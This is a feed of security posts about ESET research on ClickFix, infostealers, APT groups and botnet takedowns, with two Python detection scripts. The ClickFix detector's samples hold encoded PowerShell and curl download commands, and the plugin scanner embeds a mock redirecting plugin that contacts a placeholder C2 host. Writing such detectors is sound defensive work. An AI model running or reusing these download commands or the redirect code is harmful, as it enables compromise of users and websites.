WinRAR zero day exploited by RomCom hackers in targeted attacks https://www.helpnetsecurity.com/2025/08/11/winrar-zero-day-cve-2025-8088/ #cybersecurity #vulnerability #backdoor #software #WinRAR #News #ESET #CVE
@sidalsolgun @daniel1820815 personally, if you actually want/need some "#Antivirus" on #Linux, consider #ESET's offering...
https://help.eset.com/eeau/12/en-US/
https://www.eset.com/us/business/download/endpoint-antivirus-linux/
Personally, I consider Antivirus on Linux as #bloatware outside of #Fileserver and #eMail systems, but that's because I act as "#BenevolentDictator" and ban users from using external drives.
So the tolerance to violations is near zero, and proven willful infraction of ITsec rules ranges from getting fired to jail time in many situations.
#ClickFix went from virtually non-existent to the second most common attack vector blocked by #ESET, surpassed only by #phishing. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. #ESETresearch
ClickFix lures users by displaying bogus error messages followed by quick fix instructions, including copy-pasting malicious code. Running the code in the victim’s command line interpreter delivers malware such as #RATs, infostealers, and cryptominers.
Between H2 2024 and H1 2025, ESET’s detection for ClickFix, HTML/FakeCaptcha, skyrocketed by 517%. Most detections in ESET telemetry were reported from Japan (23%), Peru (6%), and Poland, Spain, and Slovakia (>5% each).
What makes #ClickFix so effective? The fake error message looks convincing; instructions are simple, yet the copied command is too technical for most users to understand. Pasting it into cmd leads to compromise with final payloads, including #DarkGate or #LummaStealer.
While #ClickFix was introduced by cybercriminals, it’s since been adopted by APT groups: Kimsuky, Lazarus; Callisto, Sednit; MuddyWater; APT36. NK-aligned actors used it to target developers, steal crypto and passwords from Metamask and #macOS Keychain.
#ClickFix uses psychological manipulation by presenting fake issues and offering quick solutions, which makes it dangerously efficient. It appears in many forms – error popups, email attachments, fake reCAPTCHAs – highlighting the need for greater vigilance online.
Read more in the #ESETThreatReport: https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025
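The ClickFix chain described above ends with the victim pasting a command into a command-line interpreter, which is exactly where a defender can look for it. The following Python is an added example, not code from ESET or the threat report: a small heuristic that scores process-creation events for ClickFix-style traits (an interpreter started from explorer.exe, as happens when a command is pasted into the Run dialog, plus a base64-encoded PowerShell command, a hidden window, an execution-policy bypass, a remote URL, or a download utility). The event fields, thresholds and the sample events are constructed assumptions; the domain example.invalid is a placeholder.

```python
import base64
import re

# Interpreters a ClickFix lure asks the victim to paste into (assumed list).
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                    re.IGNORECASE)
HIDDEN_RE = re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden", re.IGNORECASE)
BYPASS_RE = re.compile(r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"\b(?:curl|wget|certutil|bitsadmin|iwr|invoke-webrequest|downloadstring|downloadfile)\b",
    re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def clickfix_traits(event):
    """List the ClickFix-style traits present in one process-creation event."""
    traits = []
    if event["image"].lower() not in INTERPRETERS:
        return traits
    cmdline = event["cmdline"]
    if event["parent"].lower() == "explorer.exe":
        traits.append("interpreter launched from explorer.exe (Run dialog / pasted command)")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        traits.append("base64-encoded PowerShell command")
    # Inspect both the raw command line and the decoded payload, if any.
    text = cmdline if decoded is None else cmdline + " " + decoded
    if HIDDEN_RE.search(cmdline):
        traits.append("hidden window")
    if BYPASS_RE.search(cmdline):
        traits.append("execution policy bypass")
    if URL_RE.search(text):
        traits.append("remote URL in command line")
    if DOWNLOAD_RE.search(text):
        traits.append("download cradle")
    return traits


def is_clickfix_like(event):
    """Flag an interpreter started from explorer.exe that shows at least one more trait."""
    traits = clickfix_traits(event)
    from_explorer = any(t.startswith("interpreter launched") for t in traits)
    return from_explorer and len(traits) >= 2


def _encoded(ps_command):
    # PowerShell's -EncodedCommand expects base64 over UTF-16LE text.
    return base64.b64encode(ps_command.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry): parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc "
                + _encoded("Invoke-WebRequest http://example.invalid/verify")},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/captcha"},
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c curl http://example.invalid/a -o %TEMP%\\a.cmd"},
    {"parent": "devenv.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File build.ps1"},  # ordinary dev tooling
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe"},                             # user opened a shell
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]


def flagged_events(events=SAMPLE_EVENTS):
    """Return (image, traits) for every event the heuristic flags."""
    return [(e["image"], clickfix_traits(e)) for e in events if is_clickfix_like(e)]


if __name__ == "__main__":
    for image, traits in flagged_events():
        print(image, "->", "; ".join(traits))
```

Requiring two traits keeps a plain shell opened from the desktop out of the alert queue while still catching the hidden, encoded, URL-fetching one-liner a ClickFix page asks the user to paste; tune the parent-process condition to the Run-dialog behaviour of your own EDR's telemetry.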
After years of dominance in #ESET’s top #infostealer statistics, the era of #AgentTesla has come to an end. It finished H1 2025 in fourth place, its numbers having decreased by 57%. The reason? It is no longer under active development.
The threat actors behind Agent Tesla have reportedly lost access to the servers with the malware’s source code. A successor appeared almost immediately – another #MaaS threat, known as #SnakeStealer or #SnakeKeylogger, has claimed the number one spot.
Recommended as a suitable replacement directly in Agent Tesla’s Telegram channel, SnakeStealer now takes up almost a fifth of all infostealer detections registered by ESET telemetry. Between H2 2024 and H1 2025, its detections more than doubled.
If you want to find out more information about this changing of the guard in the infostealer threat landscape, head on over to #ESETThreatReport: https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025
ClickFix attacks skyrocketing more than 500% https://www.helpnetsecurity.com/2025/06/26/clickfix-attacks-fakecaptcha-eset-report/ #authentication #cybersecurity #cybercrime #Don'tmiss #phishing #research #attacks #scams #News #ESET
Usually I report to you (politely, of course) on leaks, thefts, espionage and other security disasters. But today? We have two gigantic wins in the war against cybercriminals - and with a Polish touch!
In the new episode I talk about the spectacular takedown of LummaStealer and the blow dealt to Danabot - two malicious beasts that for years poisoned the lives of companies and ordinary users around the world. How did they work? How were they unravelled? What were the consequences?
And most importantly - what does "fraud-as-a-service" look like behind the scenes, including prices, documentation and 24/7 customer support?
Episode prepared in cooperation with ESET and DAGMA Bezpieczeństwo IT
Check it out
https://youtu.be/fcTdhBq4U88
Analysis of a Malicious WordPress Plugin: The Covert Redirector
A malicious WordPress plugin named 'wordpress-player.php' has been discovered, affecting at least 26 websites. The plugin injects a hidden HTML5 video player and establishes a WebSocket connection to a command and control server. It redirects visitors to suspicious websites after 4-5 seconds, avoiding execution for logged-in users. The malware uses a fake 'WordPress Core' author name to evade detection. It impacts website integrity through unauthorized redirects, SEO degradation, and potential security risks to visitors. Mitigation steps include thorough scanning, malware removal, credential resets, software updates, and implementing a Web Application Firewall.
Pulse ID: 68536e4f88b62f5f7d8c4865
Pulse Link: https://otx.alienvault.com/pulse/68536e4f88b62f5f7d8c4865
Pulse Author: AlienVault
Created: 2025-06-19 01:56:31
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
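The pulse above lists concrete, file-level indicators for the plugin: a fake "WordPress Core" author header, a hidden HTML5 video element, a WebSocket connection, a redirect fired after 4-5 seconds, and a check that skips logged-in users. The Python below is an added example (not code from AlienVault or the pulse) that turns those indicators into a source scanner for plugin files; the regexes, the two-indicator threshold and the two embedded sample plugins are constructed assumptions, and c2.example.invalid is a placeholder, not an indicator from the pulse.

```python
import os
import re

# One regex per indicator named in the pulse (patterns are this example's own).
INDICATORS = {
    "fake_author_header": re.compile(r"^\s*\*?\s*Author:\s*WordPress Core\s*$",
                                     re.MULTILINE | re.IGNORECASE),
    "hidden_video_player": re.compile(r"<video[^>]*(?:display\s*:\s*none|hidden)",
                                      re.IGNORECASE),
    "websocket_connection": re.compile(r"new\s+WebSocket\s*\(\s*['\"]wss?://",
                                       re.IGNORECASE),
    "logged_in_gate": re.compile(r"is_user_logged_in\s*\(", re.IGNORECASE),
}
SET_TIMEOUT_RE = re.compile(r"setTimeout\s*\((.*?),\s*(\d+)\s*\)", re.DOTALL)


def has_delayed_redirect(source, low_ms=4000, high_ms=5999):
    """True if a setTimeout callback touches location with a 4-5 second delay."""
    for m in SET_TIMEOUT_RE.finditer(source):
        body, delay = m.group(1), int(m.group(2))
        if "location" in body and low_ms <= delay <= high_ms:
            return True
    return False


def scan_plugin_source(source):
    """Return the names of all indicators matched in one plugin's source text."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    if has_delayed_redirect(source):
        hits.append("delayed_redirect")
    return hits


def verdict(hits):
    # Any two indicators together are enough to pull the file for manual review.
    return "suspicious" if len(hits) >= 2 else "clean"


def scan_plugin_dir(root):
    """Walk a wp-content/plugins tree and report every .php file that is not clean."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_plugin_source(fh.read())
                if verdict(hits) == "suspicious":
                    report[path] = hits
    return report


# Constructed sample mirroring the behaviour the pulse describes (not the real plugin).
MALICIOUS_SAMPLE = r"""<?php
/*
Plugin Name: WordPress Player
Author: WordPress Core
*/
add_action('wp_footer', function () {
    if (is_user_logged_in()) { return; }
    echo '<video id="p" style="display:none" autoplay></video>';
    echo '<script>
      var ws = new WebSocket("wss://c2.example.invalid/ws");
      ws.onmessage = function (m) {
        setTimeout(function () { window.location.href = m.data; }, 4500);
      };
    </script>';
});
"""

# Constructed benign plugin: a visible player, a real author, no network or redirect.
BENIGN_SAMPLE = r"""<?php
/*
Plugin Name: Simple Player
Author: Jane Doe
*/
add_shortcode('player', function ($atts) {
    return '<video controls src="' . esc_url($atts['src']) . '"></video>';
});
"""

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        hits = scan_plugin_source(src)
        print(label, verdict(hits), hits)
```

Run scan_plugin_dir against a copy of wp-content/plugins taken from a suspect site; a clean plugin legitimately using is_user_logged_in or a video tag will score one indicator at most, which is why the verdict needs two before raising the file.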
https://www.europesays.com/2137357/ Iran-aligned BladedFeline spies on Iraqi and Kurdish #BackdoorWhisper #Conflicts #CyberEspionage #ESET #Iran #IranAligned #llc #OilRig #OperationRoundpress #PrimeCache #ThreatActors
The #FBI and #DCIS disrupted #Danabot. #ESET was one of several companies that cooperated in this effort. https://www.welivesecurity.com/en/eset-research/danabot-analyzing-fallen-empire/
#ESETresearch has been involved in this operation since 2018. Our contribution included providing technical analyses of the malware and its backend infrastructure, as well as identifying Danabot’s C&C servers. Danabot is a #MaaS #infostealer that has also been seen pushing additional malware – even #ransomware, such as #LockBit, #Buran, and #Crisis – to compromised systems.
We have analyzed Danabot campaigns all around the world and found a substantial number of distinct samples of the malware, as well as identified more than 1,000 C&Cs.
This infostealer is frequently promoted on underground forums. The affiliates are offered an administration panel application, a backconnect tool for real-time control of bots, and a proxy server application that relays the communication between the bots and the C&C server.
IoCs are available in our GitHub repo. You can expect updates with more details in the coming days. https://github.com/eset/malware-ioc/tree/master/danabot
An #APT group exploited #ESET flaw to execute #malware
https://securityaffairs.com/176364/security/an-apt-group-exploited-eset-flaw-to-execute-malware.html
#securityaffairs #hacking
https://www.europesays.com/de/18530/ ToddyCat: Malware exploits security hole in antivirus software #Antivirus #Deutschland #Eset #Germany #IT #Kaspersky #Malware #Science #Science&Technology #Security #Sicherheitslücken #Sicherheitsupdates #Technik #Technology #Virus #Wissenschaft #Wissenschaft&Technik
China-linked FamousSparrow APT group resurfaces with enhanced capabilities https://www.helpnetsecurity.com/2025/03/26/famoussparrow-cyberespionage-attacks-united-states/ #cybersecurity #cybercrime #Don'tmiss #research #China #News #ESET #APT #USA
Enemies with benefits: RansomHub and rival gangs share EDRKillShifter tool https://www.helpnetsecurity.com/2025/03/26/ransomhub-edrkillshifter-tool/ #ransomware #cybercime #research #News #ESET
@johl @bsi I just renewed my antivirus subscription with #ESET.
And specifically checked once more where they come from:
#bratislava - Safe!
What kind of world is this, where you have to check that sort of thing beforehand?
@topher #Antivirus is for the most part #Scareware aimed at scamming #TechIlliterates which at best only works against known threats and at worst is literal #Malware in and of itself selling user data to bad actors.
As for the rest one can just scan #Fileservers regularly and do so on #Mailservers, but existing tools to enforce quick and early updates on those distros already do most of the heavy lifting re: #ITsec...
I don't really know how this happened, but when someone from #eset calls me in roughly 135 years, hopefully I'll have made up my mind by then (I really didn't hack anything)
End of Windows 10 support: what to choose between Windows 11 and Linux
https://gomoot.com/fine-supporto-windows-10-cosa-scegliere-tra-windows-11-e-linux/
@prealpinux @linux To be precise, #ESET recommends installing a #Linux distribution as a "good option" outright, then adds "especially for older hardware". From the PI article, on the other hand, it seems the Linux option is suggested *only* in relation to dated hardware (a sort of last-resort solution). #softwarelibero #opensource